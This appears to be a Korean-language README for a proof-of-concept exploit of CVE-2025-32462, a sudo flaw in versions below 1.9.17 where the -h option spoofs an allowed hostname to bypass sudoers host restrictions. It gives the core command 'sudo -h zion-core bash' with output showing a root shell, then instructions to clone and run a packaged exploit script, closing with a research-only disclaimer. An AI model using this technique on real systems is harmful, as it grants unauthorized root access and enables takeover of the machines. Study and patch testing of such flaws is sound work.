
# CVE-2025-32462 PoC 익스플로잇 CVE-2025-32462에 대한 PoC 익스플로잇으로, 호스트네임 스푸핑을 통한 sudo 권한 상승 취약점입니다. 호스트네임 기반 제한을 우회하여 취약한 시스템(< 1.9.17)에서 루트 접근 권한을 획득하는 방법을 시연합니다.
호스트명 스푸핑 권한 상승 (CVE-2025-32462)
"너는 파란 약을 먹으면... 이야기가 끝난다. 너는 빨간 약을 먹으면... 루트를 얻는다."
이 익스플로잇은 sudo(CVE-2025-32462)에서 호스트명 기반 제한을 -h 플래그를 사용하여 우회할 수 있는 권한 상승 취약점을 시연합니다. PoC는 제한된 사용자 환경을 만든 후, 허용된 호스트명을 스푸핑하여 루트 접근을 획득하는 방식으로 이를 탈출합니다.
[user@matrix-node]$ sudo -h zion-core bash # Spoof whitelisted hostname
[root@matrix-node]# id # Got root on wrong hostname!
uid=0(root) gid=0(root) groups=0(root)
sudo -h 매개변수를 통한 호스트명 검증 우회저장소 복제:
git clone https://github.com/cybersentinelx1/CVE-2025-32462-Exploit.git
cd matrix-sudo-escape
실행 파일로 만들고 실행:
chmod +x matrix-sudo-escape.sh
./matrix-sudo-escape.sh
대화형 프롬프트에 따라 다음을 시연합니다:
교육 및 연구 목적으로만 사용하십시오. 소유한 시스템이나 테스트 권한이 있는 시스템에서만 사용하십시오.